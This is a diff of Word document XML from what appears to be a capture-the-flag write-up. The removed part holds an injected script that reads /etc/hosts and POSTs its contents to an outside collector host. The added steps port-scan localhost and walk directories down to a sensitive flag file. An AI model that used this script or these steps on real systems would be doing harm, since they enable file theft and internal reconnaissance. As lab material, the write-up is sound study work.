-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  var </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = new </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>XMLHttpRequest</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:lastRenderedPageBreak/>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhr.onload</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = function () {</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    var xhr2 = new </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>XMLHttpRequest</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    xhr2.open("POST", "https://hermes.free.beeceptor.com");</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    xhr2.send("test=" + </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>this.responseText</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  };</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhr.open</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>("GET", "/etc/hosts");</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhr.send</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>();</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>&lt;/script&gt;</w:t>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="13"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>http://localhost:</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>1</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="13"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>http://localhost:2</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="13"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>http://localhost:8873</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3007" w:type="dxa"/>
+            <w:tcW w:w="3779" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -14649,25 +14909,53 @@
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
-                <w:noProof/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:lastRenderedPageBreak/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>P</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>ort</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>-</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">scan the server till </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>the response changes.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43E78C02" wp14:editId="41C3D46C">
-                  <wp:extent cx="2127013" cy="1101219"/>
-                  <wp:effectExtent l="0" t="0" r="6985" b="3810"/>
-                  <wp:docPr id="10" name="Picture 10"/>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D6F4B65" wp14:editId="08674FF3">
+                  <wp:extent cx="2366760" cy="371436"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="3" name="Picture 3"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -14675,11 +14963,11 @@
                     <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                         <pic:nvPicPr>
-                          <pic:cNvPr id="10" name="Picture 10"/>
+                          <pic:cNvPr id="1" name=""/>
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId20"/>
+                          <a:blip r:embed="rId22"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -14687,7 +14975,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="2149725" cy="1112978"/>
+                            <a:ext cx="2483796" cy="389803"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
@@ -14700,6 +14988,207 @@
               </w:drawing>
             </w:r>
           </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="659" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4581" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="14"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>http://localhost:8873</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:r>
+              <w:t>documents</w:t>
+            </w:r>
+            <w:r>
+              <w:t>/</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="14"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>http://localhost:8873</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:r>
+              <w:t>random</w:t>
+            </w:r>
+            <w:r>
+              <w:t>/</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="14"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+            </w:pPr>
+            <w:r>
+              <w:t>http://localhost:8873/documents/background-checks/</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="14"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+            </w:pPr>
+            <w:r>
+              <w:t>http://localhost:8873/documents/background-checks/sensitive/</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="14"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>http://localhost:8873/documents/background-checks/sensitive/flag.txt</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3779" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Traverse every directory and eventually we leak out the sensitive information:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="296A971F" wp14:editId="5C387670">
+                  <wp:extent cx="2200506" cy="772090"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+                  <wp:docPr id="9" name="Picture 9"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="9" name="Picture 9"/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId23"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="2257757" cy="792178"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
         </w:tc>
       </w:tr>
     </w:tbl>
@@ -14711,8 +15200,8 @@
       </w:pPr>
     </w:p>
     <w:sectPr>
-      <w:footerReference w:type="default" r:id="rId21"/>
-      <w:footerReference w:type="first" r:id="rId22"/>
+      <w:footerReference w:type="default" r:id="rId24"/>
+      <w:footerReference w:type="first" r:id="rId25"/>
       <w:pgSz w:w="11909" w:h="16834"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
       <w:pgNumType w:start="1"/>
@@ -15452,6 +15941,92 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="555A35FF"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="812846B0"/>
+    <w:lvl w:ilvl="0" w:tplc="04090019">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%1)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="420" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="64212354"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="321EF54A"/>
@@ -15537,7 +16112,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6523477E"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="FA1E1858"/>
@@ -15623,7 +16198,93 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="65B93A87"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="25605A66"/>
+    <w:lvl w:ilvl="0" w:tplc="04090019">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%1)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="420" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
